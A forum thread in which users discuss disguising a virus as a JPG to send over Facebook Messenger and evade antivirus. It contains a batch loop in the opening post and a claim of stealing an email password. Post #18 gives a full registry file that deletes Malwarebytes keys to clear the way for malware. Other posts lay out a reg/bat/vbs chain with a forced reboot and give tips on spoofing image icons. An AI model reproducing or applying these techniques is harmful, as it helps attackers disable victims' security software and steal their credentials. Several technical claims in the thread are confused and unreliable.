CheckEmoji Community · the emoji forum
🏠 Home 🆕 What's new ❓ Unanswered 🔥 Popular 📡 RSS Members 👥 0 online log in · register
Home › IT › Software › How to hide/mask viruses?

How to hide/mask viruses?

Started by Arthur Walker9 · · 👁 4 views · 19 replies

📡 Subscribe to replies

Participants Arthur Walker9Benjamin King2briskfalcon10Zachary Barrett4Jack Alvarezrestlessnomad16Michael Jackson10
Arthur Walker9 Arthur Walker9 NewcomerOP
1 message
joined Jan 2011
#1 ·
I’ve been wondering about the best way to mask a virus so the computer just sees it as a standard JPG or JPEG file. My actual goal here is to be able to send it over Facebook Messenger without triggering all those alarms. For instance, something like this:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Benjamin King2 Benjamin King2 Active Member
138 messages
joined Apr 2007
#2 ·
An antivirus doesn't really care if you're looking at a .jpg, an .exe, or whatever else—it’ll sniff it out the second that file tries to park itself on your hard drive.
briskfalcon10 briskfalcon10 Newcomer
7 messages
joined Jan 2011
#3 ·
You can actually pull that off using Photoshop CS3; I don't think they ever added that specific feature in CS5.
Regarding the antivirus thing—the guy above is right. An AV won't flag a virus embedded in an image until it tries to write itself to the hard drive. But you could theoretically bypass that if you knew exactly which security software the target was running. You just program your malware to hit the registry first and take out the AV before it even realizes what happened.
I actually tested this out with Norton because I managed to snag the email password from someone who opened one of my files. Their Norton froze up instantly.
And look, don't come for me here. This was strictly a test. As soon as I saw it worked, I reached out to the person and let them know their password was compromised so they could change it. If I were actually being malicious, I would've locked them out and kept the credentials for myself. They’d be totally clueless right now, and I’d still be sitting in their account.
Anyway, I'm drifting off-topic knowing that person is probably reading this thread. My bad.
So, for anyone worried about being a victim: you can protect yourself by making sure things like "Web Protection" or whatever the setting is called are turned on in your antivirus settings.
Basically, as far as commercial software goes, I think CS3 is the only one that offers that specific option. Beyond that, just Google it.
Zachary Barrett4 Zachary Barrett4 Member
22 messages
joined Jul 2010
#4 ·
It honestly feels like this entire forum has just turned into one big gallery of trolls 🙄
Jack Alvarez Jack Alvarez Active Member
69 messages
joined Jan 2014
#5 ·
Zachary Barrett4 said:It feels like this entire forum has turned into a massive collection of internet trolls. 🙄

Trying to "mask" a virus using Photoshop... wow, that version of Photoshop must be some kind of digital miracle worker! 😂🤣
briskfalcon10 briskfalcon10 Newcomer
7 messages
joined Jan 2011
#6 ·
Zachary Barrett4 said:This whole forum is just a massive collection of trolls. 🙄

Look, I was actually trying to be helpful. I mentioned which software works and gave tips on how victims can protect themselves. You went off on a tangent about some troll comment, then kept trolling yourself, so now I guess I’m just trolling back.
And then you have this guy who asks if he can embed files into an image using CS3, and once he finally figures out how to scan a picture with Norton, he loses his mind.
Zachary Barrett4 Zachary Barrett4 Member
22 messages
joined Jul 2010
#7 ·
briskfalcon10 said:I was just trying to explain which software you could use, and how people might protect themselves from being targeted. He went on and on about some hypothetical scenario involving trolls, and since you just kept trolling, I guess I'm just trolling back now.
a then you go off on this tangent asking if CS3 can embed files directly into an image, and once you finally wrap your head around how to scan an image with an antivirus, you'll probably be running around in circles looking for answers.

And honestly, what's the big deal if someone embeds a file in an image? Any decent antivirus will catch the malicious code the second it tries to execute and shut the whole thing down before any damage is done.

But hey, don't mind me—you guys are all elite Facebook hackers, so I'm sure you've got everything completely under control. 😂
restlessnomad16 restlessnomad16 Newcomer
7 messages
joined Dec 2012
#8 ·
Alright, Mr. All-Knowing, why don't you go ahead and show us how it's done? Show us how you shove a virus into a JPG while keeping it an actual JPG file—because honestly, that sounds impossible. The only way you're doing that is by tossing it into a folder and using a batch script to spoof the icon as an image. That way, if the victim is clueless enough to open the folder, they see an icon that looks like a picture and a filename that looks legit, and let's be real, most people don't even bother looking at the file extension.
briskfalcon10 briskfalcon10 Newcomer
7 messages
joined Jan 2011
#9 ·
Zachary Barrett4 said:So, what happens when you try to hide a file inside an image? Honestly, most modern antivirus software catches it instantly. The second that malicious code tries to run, the system just shuts the whole thing down and blocks access before anything can actually happen. It’s pretty much dead on arrival.

Alright, fine. You all act like you're some kind of elite Facebook Messenger hackers, so I guess you actually know what you're doing. 😂

Don't you know how these things work? An antivirus won't catch anything if the malicious code is tucked inside an image file. Once you open that picture, it triggers a registry file that basically freezes the antivirus right there in the system settings. And once the security software is paralyzed, that's when the actual virus kicks in.
Antivirus software usually doesn't do much when it comes to .reg files. As far as I know, they just sit there.
briskfalcon10 briskfalcon10 Newcomer
7 messages
joined Jan 2011
#10 ·
restlessnomad16 said:Look, why don't you show us your "god-like" powers? Explain how you actually hide a virus inside a JPG while keeping it a valid JPG. That’s physically impossible. The only way is to shove it in a folder and use a batch script to spoof the icon so it looks like an image. If the victim is clueless enough to open a folder without looking at the file extension, they see an icon that looks like a photo and a filename that looks right, and they click. Most people aren't even paying attention to the extension anyway.

Maybe go read up on CS3 first. If you were actually some kind of digital wizard, you'd have sent me a virus by now.
Besides, you don't even need Photoshop for this. You can just use a basic CMD command to merge a file and an image together so it stays a .png—you know, those old-school copy/paste commands.
Do some legwork. Google it. I didn't hand-feed this info to anyone.
Jack Alvarez Jack Alvarez Active Member
69 messages
joined Jan 2014
#11 ·
briskfalcon10 said:Don't you know how these things work? An antivirus isn't going to spot a threat hidden inside an image file. What actually happens is that once you open that image, it triggers a registry file that essentially freezes the antivirus right there in the system registry, clearing a path for the virus to run.
From what I understand, most antivirus software doesn't even react to registry files like that.

Seriously, I am BEGGING you—please, just send me that "virus" of yours, packed into an image that executes a reg key to freeze my Norton and let the malware install itself on my PC... go ahead, send it over!🙂🙂🙂🙂🙂
briskfalcon10 briskfalcon10 Newcomer
7 messages
joined Jan 2011
#12 ·
Jack Alvarez;31215345 said:Please, I am BEGGING you to send me that virus of yours—the one hidden in an image that triggers a regkey, freezes my Norton, and lets the malware install itself on my rig... just send it over 🙂🙂🙂🙂🙂[/QUOT

Honestly, I can't even be bothered to open Photoshop for you.
The guy asked a question nicely, and I answered him nicely. What's the point in talking nonsense...
What’s your deal? When someone says something you clearly don't get, you just pretend you're some genius..
God forbid anyone actually knows more than you do...
Oh yeah, you're clearly the smartest and funniest guy around... just look at your last post. You're so incredibly full of yourself and your "expertise" that it's actually pathetic.
Go ahead and open your regedit and learn how to make entries in Notepad. A ten-year-old could stick a reg key in an image because they aren't burdened by such a massive ego.
It would take fifteen minutes of Googling to pull that off.
Go ahead, feel proud of that last post. You're the smartest person on this forum, you know everything, and you totally schooled me. I'll admit, I was talking nonsense.
🙂
Jack Alvarez Jack Alvarez Active Member
69 messages
joined Jan 2014
#13 ·
@ briskfalcon10

Look, I think you’re struggling to even get Photoshop running because you aren't quite sure how to launch it, rather than there being some issue on my end... I honestly feel—and I'm not the only one thinking this—that you don't really have a handle on what you're talking about here. But hey, if you truly believe you've got it figured out, please, by all means, walk us through your logic so the rest of us can finally wrap our heads around it.
PS.
I'm still sitting here waiting for you to produce that virus you mentioned🙂🙂. And listen, I'm not saying it's impossible for someone to pull this off, I'm just saying that YOU specifically haven't been able to, especially since you admitted you only managed to snag that email password because you froze the entire Node system.!!!!
Zachary Barrett4 Zachary Barrett4 Member
22 messages
joined Jul 2010
#14 ·
Jack Alvarez said:@ briskfalcon10

The thing is, you probably need to open PowerShell because you aren't quite sure how to navigate it, rather than it being any issue with me... I think—and honestly, I’m not alone in thinking this—that you might be a bit out of your depth here. But hey, if you really feel like you know what you're talking about, why don't you enlighten us? It would be great if we could all finally wrap our heads around your logic.
PS.
I am still sitting here waiting for you to produce that virus of yours.🙂🙂 Now, I'm not saying it's impossible for such a thing to exist, but rather that YOU can't actually find it, mostly because you claimed you managed to crack the email password only by freezing up the entire OS.!!!!

Personally, I'd love to see that JPG file just to see what Norton has to say about it. Because, from what I understand, neither it nor any other standard antivirus software typically reacts to those kinds of registry-based viruses. 😂
Michael Jackson10 Michael Jackson10 Active Member
140 messages
joined Feb 2023
#15 ·
briskfalcon10 said:Don't you know how this works? An antivirus won't see a malicious payload hidden inside an image file. Once you open that image, it triggers a reg file that freezes the antivirus in the registry, and then—boom—the virus runs.
As far as I know, most antivirus software doesn't even react to reg files.

Look, I'm no computer graphics expert, but how exactly does an image "run"?
Sure, a program interprets a graphic format like a JPG to create a raster for your monitor, fine. But come on, if you rasterized a batch file, you'd just end up with a bunch of tiny dots—an image of a batch file. Without OCR, there's no going back. Or is there??
briskfalcon10 briskfalcon10 Newcomer
7 messages
joined Jan 2011
#16 ·
Jack Alvarez said:@ briskfalcon10

You need to open Photoshop because you don't know how, not because of me... I’m standing—along with everyone else here—by the fact that you have absolutely no clue what you're talking about. But hey, if you actually knew something, why don't you enlighten us? Let us understand.
PS.
I’m still waiting for that virus of yours.🙂🙂 I’m not saying it’s impossible, I’m just saying YOU can’t do it, because you claimed you got the email password by freezing Norton.!!!!

If you're so limited that you can't figure out a registry file hidden inside an image using an option in a Photoshop layer, then maybe you should look into special education.
I don't teach people who struggle with basic comprehension.
And if you knew even a fraction of what we know here, instead of trolling, you would have Googled:
1. how to hide a file inside a png or jpg
2. how to create a registry key in Notepad
3. plug a Duracell into your neck, install Norton, find its registry key, and apply option 2 there.
It’s a shame for this forum that I’m probably going to get banned or warned just for calling you out while the mods likely think you're funny. Meanwhile, nobody realizes that 12-year-olds on YouTube put out tutorials for all three of those things.
Then there's option four: a virus embedded in an image that restarts the computer five minutes after it's opened. Once the PC reboots, Norton won't be running, and the virus takes over on its own.
A 15-year-old on YouTube could write a batch command to restart a computer after five minutes. If you're claiming that .reg and .batch files are inherently "malicious software," then go hide in a corner and cry.
"THE BATCH COMMAND WILL RESTART THE COMPUTER SO THAT THE VIRUS RUNS DURING THE NEXT BOOT, ONCE THE ANTIVIRUS KEY HAS ALREADY BEEN SET TO 0 IN THE REGISTRY." And obviously, the software won't recognize it that way. In professional coding, you use time intervals; it doesn't all happen at once like the nonsense coming out of your head.
Maybe the lightbulb finally flickered on: there are three files in that image that run in this order: .reg, .bat, and .vbs, spaced out by time. Out of all that, only the vbs is the actual virus that triggers from the image once the antivirus is dead. If you had any logic, you'd realize it's just a jpg; there's no vbs visible because a vbs isn't a program capable of parsing an image like Photoshop is.
That's the part your brain just can't grasp, and you kept pushing my buttons until I'd end up getting banned.
There's a fifth option too, but I won't even bother discussing it because you'll never be able to wrap your head around it:
How the virus gets the password, but that’s not even the point.
Please, stop embarrassing yourself and this forum. Stop bothering me and go watch a YouTube tutorial; some kids there can explain it to you.
Thanks to the mods for the ban. You, stay limited and keep Googling, and leave me alone.
Look at the guy who actually asked the question; he already figured out half the setup because he isn't dense like you.
What are you even doing here? A guy asked a question, I answered him, and instead of helping, you showed up to troll and trash my help for him.
But sure, I'll be the one getting warned instead of you.
Get lost.
Jack Alvarez Jack Alvarez Active Member
69 messages
joined Jan 2014
#17 ·
briskfalcon10 said:If you’re really too thick to wrap your head around this... look, I don't spend my time trying to teach people who just can't grasp basic concepts... there are five different ways to do this that I'm not even going to bother explaining, because you'll never be able to follow along anyway.
Now we've got option four: a virus disguised as an image file that forces the computer to reboot just five minutes after you open it.

Man, you are truly exhausting... honestly, I’m not looking to get into a shouting match here, but since you seem to think I just can't understand certain things—which is exactly what I'm curious about—I'd love some clarity. (And hey, I already know that fourth little trick using %WINDIR%\system32\shutdown.exe -r -t [time]... "hiding" a file inside an image is old news to me.) But this whole thing about freezing antivirus software? That part just doesn't compute for me. I mean, if anyone can pull that off, then why should I even bother with Norton anymore? It's clearly useless. Just show us! Since you act like coding this is child's play for you, why don't you just drop a link to the virus so us skeptics can see it for ourselves? Can you actually build something like that, or is the real question whether you're actually willing to do it?
briskfalcon10 briskfalcon10 Newcomer
7 messages
joined Jan 2011
#18 ·
Look, if we’re going to skip the arguing, just ask me nicely and I’ll show you what I mean.
For instance, I grabbed the free version of Malwarebytes, installed it, and checked MSConfig to see if it was set to run at startup. After a quick reboot, sure enough, there it was.
DO THE SAME THING.
Once you’ve confirmed it actually kicks off after a restart, open up Notepad, paste everything below into it, and save the file as removesuper.reg

Windows Registry editor version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes\Malwarebytes]
"ApplicationPath"="C:\\Program Files\\Malwarebytes"
"InstallationTime"=hex:db,07,01,00,05,00,07,00,08, 00,2b,00,3b,00,6d,00
"TIResellerId"=dword:00000000
"TIRetrieved"="no"
"SetupWizardComplete"="yes"
"ApplicationGUID"="{25910D24-747F-4D1B-A876-3D96817A56AD}"
"Registration"=dword:00000000
"Activation"=hex:00,00,00,00,00,00,00,00,00,00,00, 00,00,00,00,00,00
"SubscriptionExpiration"=hex:00,00,00,00,00,00,00, 00,00,00,00,00,00,00,00,00
"LastUpdateVersion"="4, 48, 0, 1000"
"ComponentsVerified"="no"
"TIReferrer"=""
"TITag"=""
"TIExtra"=""
"TIComplete"=""
"ESellerate"="no"
"RenewalDialogShown"="no"
"ScanFirstChancePreventionEnabled"="no"
"ScanFirstChancePreventionScanOnStartup"="no"
"ScanFirstChancePreventionScanOnShutdown"="no"
"ScanFirstChancePreventionScanServices"="no"
"ScanFaultCount"=dword:00000000
"AccountsMigrated"="yes"
"AppDataPath"="C:\\Documents and Settings\\Owner\\Application Data\\Malwarebytes\\Malwarebytes"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes\Malwarebytes\InUseFiles]

[-HKEY_CURRENT_USER\Software\Malwarebytes]

[-HKEY_CURRENT_USER\Software\Malwarebytes\Malwarebytes]
"MachineID"=""
"PreConfigurationComplete"="yes"
"UseXPStyleMenus"="yes"
"ShowSplashScreen"="yes"
"ScanRequired"="no"
"NotifyHomePageChanged"="yes"
"NotifySpywareBlocked"="yes"
"EnableRealTimeProtection"="no"
"CheckForUpdates"="no"
"CheckForUpdatesOnStartup"="no"
"CheckForUpdatesInterval"=dword:00000008
"LastUpdateCheckTime"=hex:db,07,01,00,05,00,07,00, 02,00,2c,00,0b,00,7a,03
"NotifyAdBlockSoundPath"="C:\\Program Files\\Malwarebytes\\detect.wav"
"NotifyPlaySound"="no"
"EventLoggingActive"="no"
"EventLoggingFlags"=dword:00000000
"UseSystemHook"="yes"
"OptionalDisplayItems"=hex:01,01,01,01,01,01,01,01 ,01,01,01,01,01,01,01,01,01,\
01,01,01,01,01,01,01,01,01,01,01,01,01,01,01,01,01 ,01,01,01,01,01,01,01,01,\
01,01,01,01,01,01,01,01,01,01,01,01,01,01,01,01,01 ,01,01,01,01,01,01,01,01,\
01,01,01,01,01,01,01,01,01,01,01,01,01,01,01,01,01 ,01,01,01,01,01,01,01,01,\
01,01,01,01,01,01,01,01,01,01,01,01,01,01,01,01,01 ,01,01,01,01,01,01,01,01,\
01,01,01,01,01,01,01,01,01,01,01
"ProtectHomePage"="no"
"ProtectHomePageAsked"="yes"
"ProtectedHomePage"="http://www.google.com/"
"VersionProcessList"=dword:0000185e
"VersionProcessListRelated"=dword:00000fd2
"UNCUpdateServerPath"=""
"LimitedAccess"="no"
"SilentUpdates"="no"
"EnableHotKeys"="yes"
"GetCommandLineFromProcess"="yes"
"TerminationProtection"="yes"
"TerminationProtectionAllowedTrusted"="yes"
"IntegrateWithSecurityCenter"="yes"
"UpgradeToProfessionalCompleted"="no"
"Language"="English (US)"
"ScanScheduleEnabled"="no"
"ScanScheduleRebootIfRequired"="no"
"ScanScheduleShutdownAfterScan"="no"
"ScanScheduleAutomaticallyRemoveItems"="no"
"ScanScheduleHideUserInterface"="no"
"ScanScheduleScanType"=dword:00000000
"ScanPromptedFirstTime"="yes"
"ScanSkipLargeFiles"="yes"
"ScanCleanCookies"="yes"
"ScanShowRemovalWarning"="yes"
"ScanScheduleFrequency"=dword:00000007
"ScanScheduleTime"=hex:00,00,00,00,00,00,00,00,00, 00,00,00,00,00,00,00
"ScanScheduleLastTime"=hex:db,07,01,00,06,00,08,00 ,03,00,2e,00,1c,00,0f,00
"ScanScheduleLastScanTime"=hex:db,07,01,00,05,00,0 7,00,02,00,2c,00,19,00,b9,03
"ScanLastDefinitionUpdateTime"=hex:db,07,01,00,05, 00,07,00,02,00,2b,00,3a,00,\
03,02
"ScanLastDefinitionCheckTime"=hex:db,07,01,00,06,0 0,08,00,03,00,2e,00,1b,00,61,\
02
"ScanLastDefinitionRemindTime"=hex:00,00,00,00,00, 00,00,00,00,00,00,00,00,00,\
00,00
"ScanRemindCheckForDefinitionUpdates"="yes"
"ScanRemindCheckForDefinitionUpdatesDays"=dword:00 000005
"ScanType"=dword:00000001
"ScanMinFileSize"=dword:00400000
"ScanOnlyKnownFileTypes"="yes"
"ScanSkipInternetCache"="yes"
"ScanLimitRecursionDepth"="no"
"ScanIgnoreNonExecutableFiles"="yes"
"ScanIgnoreSystemRestore"="no"
"ScanShowIconInSystemTray"="yes"
"ScanKeepLogs"="yes"
"ScanKeepCleanLogs"="yes"
"ScanLogRealTimeBlockedItems"="yes"
"ScanSelectedDrives"=dword:00000018
"ScanCustomMemory"="yes"
"ScanCustomRegistry"="yes"
"ScanCustomStartup"="yes"
"ScanCustomFolders"="yes"
"ScanCustomCookies"="yes"
"ScanAutoScanType"=dword:00000003
"ScanAutoScanCheckForUpdates"="yes"
"ScanScheduleCheckForUpdates"="yes"
"ScanCloseBrowsers"="no"
"ScanResolveLinks"="yes"
"ScanTerminateMemoryThreats"="no"
"ScanDonationAsked"="no"
"ScanUseKernelFileDirect"="yes"
"ScanUseKernelRegistryDirect"="yes"
"ScanUseDirectDiskAccess"="yes"
"ScanADS"="yes"
"ScanDisplayContextMenu"="yes"

[-HKEY_CURRENT_USER\Software\Malwarebytes\Malwarebytes\CLSIDRestoreList]

[-HKEY_CLASSES_ROOT\MalwarebytesContextMenuExt.SASCon.1]
@="SASContextMenu Class"

[-HKEY_CLASSES_ROOT\MalwarebytesContextMenuExt.SASCon.1\CLSID]
@="{CA8ACAFA-5FBB-467B-B348-90DD488DE003}"

[-HKEY_CLASSES_ROOT\MalwarebytesContextMenuExt.SASConte]
@="SASContextMenu Class"

[-HKEY_CLASSES_ROOT\MalwarebytesContextMenuExt.SASConte\CLSID]
@="{CA8ACAFA-5FBB-467B-B348-90DD488DE003}"

[-HKEY_CLASSES_ROOT\MalwarebytesContextMenuExt.SASConte\CurVer]
@="MalwarebytesContextMenuExt.SASCon.1"

Once you've saved it, run the thing and reboot your PC.
When you get back, Malwarebytes will start reinstalling itself. It stays inactive while that process is running.
If we had added the registry keys for the startup, it wouldn't have even launched.
That would’ve been way too much work, so I kept it simple.
There's one little catch left: how to make it run automatically without asking "do you want to do this?" every time you double-click the file. If you put in the effort, you can figure that part out.
If I sketched out every single detail, people would just abuse it.
What you see here doesn't completely wipe Malwarebytes—that's a massive undertaking and wouldn't work everywhere—but it gives the malware enough breathing room to kick in.
Since you're reading this in Notepad, you probably noticed all those options like "scan..." set to "yes".
If you actually wanted to stop Malwarebytes from scanning certain things, you'd have to rebuild everything differently just to swap "yes" for "no".
You also see the "SetupWizardComplete" option; it shows you just how many possibilities are tucked away in there.
Jack Alvarez Jack Alvarez Active Member
69 messages
joined Jan 2014
#19 ·
Hold on a second there, buddy. You’re asking me to just whip up a registry file and run it so I can disable Malwarebytes... but what I’m really wondering is how that registry file would even look if you have no clue what kind of security software the victim is actually running when you try to send them that file hidden inside an image. I mean, if someone just double-clicks the picture and that registry file integrates itself into the system without any extra prompts or warnings, you'd basically be trying to write code that—at the very latest by the next PC restart—disables whatever antivirus they happen to have installed, only to follow it up by installing some malware. It's a bit of a leap! Honestly, I think creating a registry file specifically designed to "wipe" a certain piece of software from the startup list isn't exactly rocket science, but there are a lot of variables involved here.
restlessnomad16 restlessnomad16 Newcomer
7 messages
joined Dec 2012
#20 ·
@restlessnomad16/">@@restlessnomad16 man, seriously? who is actually dumb enough to run a .reg extension first thing? I’m telling you, it’s not even hard to whip up some brainless little virus these days. Every ten-year-old kid sits there typing "how to make a virus" into Google, finds some crappy batch script, and suddenly thinks they’re some elite hacker. If you actually want to trick someone, the virus needs to be way more complex than a basic batch file that any guy with half a brain can just right-click and inspect the source code on.

You totally forgot about the firewall. How are you even going to bypass that? Especially since McAfee isn't going to touch it—it monitors every single outgoing file and shuts it down the second it looks like a theft attempt. You’d have to be a total geek to break through that. I mean, sure, anything is possible, but not with batch files and that kind of amateur garbage. You really have to rely on the victim being completely naive.

You must log in or register to reply here.

Log in Register

🔗 Similar threads